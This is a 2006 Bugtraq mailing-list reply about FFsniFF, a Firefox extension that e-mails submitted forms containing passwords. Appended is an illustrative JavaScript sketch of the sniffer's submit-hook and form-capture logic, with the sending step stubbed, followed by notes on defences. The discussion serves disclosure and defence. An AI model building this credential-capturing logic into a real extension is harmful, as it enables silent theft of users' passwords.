Date: Wed, 01 Mar 2006 14:02:11 -0600
From: Ben <ben@...geekzone.com>
To: azurIt <azurit@...ox.sk>
Cc: bugtraq@...urityfocus.com
Subject: Re: Evil side of Firefox extensions


azurIt wrote:
> Background
> ----------
> Firefox is a very popular and secure web browser. By now it is used by
> millions of people and thousands of internet clubs. One of the great features of
> Firefox is extensions. You can use them to create things inside your browser
> which are beyond your imagination. But everything has another side..
>
> Overview
> --------
> Writing a powerful extension is an extremely simple process. Extensions are
> allowed to do _everything_ with your browser: they can change the skin, block
> banners on pages or even create a network connection and send data through it to
> the internet. The worst of all is that _anyone_ who has physical access to
> your computer can install extensions into your browser _without_ notifying
> you.
>
> As an example, I created a simple html form sniffer. You can download it here:
> http://azurit.gigahosting.cz/ffsniff/
>
> It was tested only with Firefox 1.0.x and 1.5.x .
>
> FFsniFF is a simple Firefox extension which transforms your browser into an
> HTML form sniffer. Every time the user clicks on the 'Submit' button, FFsniFF will try
> to find a non-blank password field in the form. If one is found, the entire form (along
> with the URL) is sent to the specified e-mail address.
>
> Solution
> --------
> I think that the solution to this should be the ability to lock the
> installation of extensions with a password. Every user will be able to read the hash
> of the password (so the browser can verify it) and only the system administrator
> will be allowed to change it (it can be stored, for example, in the registry
> [Windows] or somewhere in the /etc dir [Linux]).
>
>
> azurIt, azurIt@...net, azurit (at) pobox (dot) sk
>   
I just tested this out at our university using Windows XP and while
anyone can install Firefox extensions, they are installed to their
Firefox profile in the logged-in user's Application Data folder. A
simple workaround for this is to not have shared system accounts, at
least for Windows XP. I haven't verified the extension installation
location for other operating systems.

Ben
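The submit hook azurIt describes (find a non-blank password field on submit, ship the whole form plus URL), as an added illustration that is not FFsniFF's code and is not part of either message above. The browser-independent core is written as plain functions so it runs under Node; the mock form objects and the `example.invalid` URLs are constructed for the example, and the `exfil` callback stands in for the e-mail step, which is deliberately left out. In a real extension the handler would be registered with a capturing `"submit"` listener on the document.

```javascript
// Added example: core logic of a form-sniffing extension, as pure functions.
// Not FFsniFF's code. Nothing here sends data anywhere.

// Return the password-type fields of a form whose value is non-blank.
function nonBlankPasswordFields(form) {
  return Array.from(form.elements).filter(
    (el) =>
      el.type === "password" &&
      typeof el.value === "string" &&
      el.value.trim() !== ""
  );
}

// Serialize every named field of the form together with the page URL.
// This is the record a sniffer would ship off-box; note that it contains
// the password in the clear, since the hook runs before any TLS applies.
function captureForm(url, form) {
  const fields = {};
  for (const el of form.elements) {
    if (!el.name) continue;
    fields[el.name] = el.value;
  }
  return { url, fields };
}

// Build a submit handler. Only forms carrying a non-blank password are
// captured; everything else is ignored so the hook stays quiet.
// `exfil` is a stand-in for the mail-sending step (assumption: in a browser
// this would be document.addEventListener("submit", handler, true)).
function makeSubmitHandler(exfil) {
  return function onSubmit(event) {
    const form = event.target;
    if (nonBlankPasswordFields(form).length === 0) return;
    exfil(captureForm(form.ownerDocument.location.href, form));
  };
}

// Constructed mock forms (hypothetical host example.invalid).
const loginForm = {
  ownerDocument: { location: { href: "https://example.invalid/login" } },
  elements: [
    { name: "user", type: "text", value: "alice" },
    { name: "pass", type: "password", value: "hunter2" },
    { name: "remember", type: "checkbox", value: "on" },
  ],
};

const searchForm = {
  ownerDocument: { location: { href: "https://example.invalid/search" } },
  elements: [{ name: "q", type: "text", value: "firefox extensions" }],
};

// Drive the handler with two submits; only the login form should be captured.
function demo() {
  const captured = [];
  const handler = makeSubmitHandler((record) => captured.push(record));
  handler({ target: loginForm });
  handler({ target: searchForm });
  return captured;
}

console.log(JSON.stringify(demo(), null, 2));
```

The point of the example is how little code the attack needs: the handler runs with the extension's privileges inside the user's profile, sees the form before it leaves the browser, and needs no exploit of any kind. That is also why Ben's observation matters: the hook lives in one user's profile, so per-user accounts confine it to whoever installed it. Outside the page's timeframe, current Firefox implements the administrator-controlled lock azurIt proposes through Enterprise Policies (the `ExtensionSettings` policy in policies.json, read from the install directory, the Windows registry or /etc/firefox/policies on Linux).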


